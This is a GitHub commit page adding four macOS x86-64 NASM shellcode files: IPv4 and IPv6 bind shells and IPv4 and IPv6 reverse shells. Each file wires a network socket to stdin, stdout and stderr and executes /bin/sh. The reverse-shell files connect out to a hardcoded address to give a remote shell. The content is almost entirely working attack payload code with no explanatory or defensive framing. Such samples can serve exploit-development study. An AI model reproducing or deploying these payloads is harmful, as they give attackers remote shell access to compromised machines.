-
Notifications
You must be signed in to change notification settings - Fork 4
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit b4c84eb
Showing
4 changed files
with
301 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,79 @@ | ||
| ;nasm -f macho64 -o ipv4bind.o ipv4bind.s && ld -macosx_version_min 10.7.0 -o ipv4bind ipv4bind.o | ||
|
|
||
| BITS 64 | ||
|
|
||
| section .text | ||
|
|
||
| global start | ||
|
|
||
| start: | ||
| ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) | ||
| xor rdi, rdi | ||
| mul rdi | ||
| mov dil, 0x2 | ||
| xor rsi, rsi | ||
| mov sil, 0x1 | ||
| mov al, 0x2 | ||
| ror rax, 0x28 | ||
| mov r8, rax | ||
| mov al, 0x61 | ||
| syscall | ||
|
|
||
| ; struct sockaddr_in { | ||
| ; __uint8_t sin_len; | ||
| ; sa_family_t sin_family; | ||
| ; in_port_t sin_port; | ||
| ; struct in_addr sin_addr; | ||
| ; char sin_zero[8]; | ||
| ; }; | ||
| mov rsi, 0xffffffffa3eefdf0 | ||
| neg rsi | ||
| push rsi | ||
| push rsp | ||
| pop rsi | ||
|
|
||
| ; bind(host_sockid, &sockaddr, 16) | ||
| mov rdi, rax | ||
| xor dl, 0x10 | ||
| mov rax, r8 | ||
| mov al, 0x68 | ||
| syscall | ||
|
|
||
| ; listen(host_sockid, 2) | ||
| xor rsi, rsi | ||
| mov sil, 0x2 | ||
| mov rax, r8 | ||
| mov al, 0x6a | ||
| syscall | ||
|
|
||
| ; accept(host_sockid, 0, 0) | ||
| xor rsi, rsi | ||
| xor rdx, rdx | ||
| mov rax, r8 | ||
| mov al, 0x1e | ||
| syscall | ||
|
|
||
| mov rdi, rax | ||
| mov sil, 0x3 | ||
|
|
||
| dup2: | ||
| ; dup2(client_sockid, 2) | ||
| ; -> dup2(client_sockid, 1) | ||
| ; -> dup2(client_sockid, 0) | ||
| mov rax, r8 | ||
| mov al, 0x5a | ||
| sub sil, 1 | ||
| syscall | ||
| test rsi, rsi | ||
| jne dup2 | ||
|
|
||
| ; execve("//bin/sh", 0, 0) | ||
| push rsi | ||
| mov rdi, 0x68732f6e69622f2f | ||
| push rdi | ||
| push rsp | ||
| pop rdi | ||
| mov rax, r8 | ||
| mov al, 0x3b | ||
| syscall | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,66 @@ | ||
| ;nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o | ||
|
|
||
| BITS 64 | ||
|
|
||
| section .text | ||
|
|
||
| global start | ||
|
|
||
| start: | ||
| ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) | ||
| xor rdi, rdi | ||
| mul rdi | ||
| mov dil, 0x2 | ||
| xor rsi, rsi | ||
| mov sil, 0x1 | ||
| mov al, 0x2 | ||
| ror rax, 0x28 | ||
| mov r8, rax | ||
| mov al, 0x61 | ||
| syscall | ||
|
|
||
| ; struct sockaddr_in { | ||
| ; __uint8_t sin_len; | ||
| ; sa_family_t sin_family; | ||
| ; in_port_t sin_port; | ||
| ; struct in_addr sin_addr; | ||
| ; char sin_zero[8]; | ||
| ; }; | ||
| mov rsi, 0xfeffff80a3eefdf0 | ||
| neg rsi | ||
| push rsi | ||
| push rsp | ||
| pop rsi | ||
|
|
||
| ; connect(sockid, &sockaddr, 16) | ||
| mov rdi, rax | ||
| xor dl, 0x10 | ||
| mov rax, r8 | ||
| mov al, 0x62 | ||
| syscall | ||
|
|
||
| xor rsi, rsi | ||
| mov sil, 0x3 | ||
|
|
||
| dup2: | ||
| ; dup2(sockid, 2) | ||
| ; -> dup2(sockid, 1) | ||
| ; -> dup2(sockid, 0) | ||
| mov rax, r8 | ||
| mov al, 0x5a | ||
| sub sil, 1 | ||
| syscall | ||
| test rsi, rsi | ||
| jne dup2 | ||
|
|
||
| ; execve("//bin/sh", 0, 0) | ||
| push rsi | ||
| mov rdi, 0x68732f6e69622f2f | ||
| push rdi | ||
| push rsp | ||
| pop rdi | ||
| xor rdx, rdx | ||
| mov rax, r8 | ||
| mov al, 0x3b | ||
| syscall | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,83 @@ | ||
| ;nasm -f macho64 -o ipv6bind.o ipv6bind.s && ld -macosx_version_min 10.7.0 -o ipv6bind ipv6bind.o | ||
|
|
||
| BITS 64 | ||
|
|
||
| section .text | ||
|
|
||
| global start | ||
|
|
||
| start: | ||
| ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP) | ||
| xor rdi, rdi | ||
| mul rdi | ||
| mov dil, 0x1e | ||
| xor rsi, rsi | ||
| mov sil, 0x1 | ||
| mov al, 0x2 | ||
| ror rax, 0x28 | ||
| mov r8, rax | ||
| mov al, 0x61 | ||
| syscall | ||
|
|
||
| ; struct sockaddr_in6 { | ||
| ; __uint8_t sin6_len; | ||
| ; sa_family_t sin6_family; | ||
| ; in_port_t sin6_port; | ||
| ; __uint32_t sin6_flowinfo; | ||
| ; struct in6_addr sin6_addr; | ||
| ; __uint32_t sin6_scope_id; | ||
| ; }; | ||
| xor rsi, rsi | ||
| push rsi | ||
| push rsi | ||
| push rsi | ||
| mov rsi, 0xffffffffa3eee1e4 | ||
| neg rsi | ||
| push rsi | ||
| push rsp | ||
| pop rsi | ||
|
|
||
| ; bind(host_sockid, &sockaddr, 28) | ||
| mov rdi, rax | ||
| xor dl, 0x1c | ||
| mov rax, r8 | ||
| mov al, 0x68 | ||
| syscall | ||
|
|
||
| ; listen(host_sockid, 2) | ||
| xor rsi, rsi | ||
| mov sil, 0x2 | ||
| mov rax, r8 | ||
| mov al, 0x6a | ||
| syscall | ||
|
|
||
| ; accept(host_sockid, 0, 0) | ||
| xor rsi, rsi | ||
| xor rdx, rdx | ||
| mov rax, r8 | ||
| mov al, 0x1e | ||
| syscall | ||
|
|
||
| mov rdi, rax | ||
| mov sil, 0x3 | ||
|
|
||
| ; dup2(client_sockid, 2) | ||
| ; -> dup2(client_sockid, 1) | ||
| ; -> dup2(client_sockid, 0) | ||
| dup2: | ||
| mov rax, r8 | ||
| mov al, 0x5a | ||
| sub sil, 1 | ||
| syscall | ||
| test rsi, rsi | ||
| jne dup2 | ||
|
|
||
| ; execve("//bin/sh", 0, 0) | ||
| push rsi | ||
| mov rdi, 0x68732f6e69622f2f | ||
| push rdi | ||
| push rsp | ||
| pop rdi | ||
| mov rax, r8 | ||
| mov al, 0x3b | ||
| syscall |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,73 @@ | ||
| ;nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o | ||
|
|
||
| BITS 64 | ||
|
|
||
| section .text | ||
|
|
||
| global start | ||
|
|
||
| start: | ||
| ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP) | ||
| xor rdi, rdi | ||
| mul rdi | ||
| mov dil, 0x1e | ||
| xor rsi, rsi | ||
| mov sil, 0x1 | ||
| mov al, 0x2 | ||
| ror rax, 0x28 | ||
| mov r8, rax | ||
| mov al, 0x61 | ||
| syscall | ||
|
|
||
| ; struct sockaddr_in6 { | ||
| ; __uint8_t sin6_len; | ||
| ; sa_family_t sin6_family; | ||
| ; in_port_t sin6_port; | ||
| ; __uint32_t sin6_flowinfo; | ||
| ; struct in6_addr sin6_addr; | ||
| ; __uint32_t sin6_scope_id; | ||
| ; }; | ||
| xor rsi, rsi | ||
| push rsi | ||
| mov rbx, 0xfeffffffffffffff | ||
| not rbx | ||
| push rbx | ||
| push rsi | ||
| mov rsi, 0xffffffffa3eee1e4 | ||
| neg rsi | ||
| push rsi | ||
| push rsp | ||
| pop rsi | ||
|
|
||
| ; connect(sockid, &sockaddr, 28) | ||
| mov rdi, rax | ||
| xor dl, 0x1c | ||
| mov rax, r8 | ||
| mov al, 0x62 | ||
| syscall | ||
|
|
||
| xor rsi, rsi | ||
| mov sil, 0x3 | ||
|
|
||
| dup2: | ||
| ; dup2(sockid, 2) | ||
| ; -> dup2(sockid, 1) | ||
| ; -> dup2(sockid, 0) | ||
| mov rax, r8 | ||
| mov al, 0x5a | ||
| sub sil, 1 | ||
| syscall | ||
| test rsi, rsi | ||
| jne dup2 | ||
|
|
||
| ; execve("//bin/sh", 0, 0) | ||
| push rsi | ||
| mov rdi, 0x68732f6e69622f2f | ||
| push rdi | ||
| push rsp | ||
| pop rdi | ||
| xor rdx, rdx | ||
| mov rax, r8 | ||
| mov al, 0x3b | ||
| syscall | ||
|
|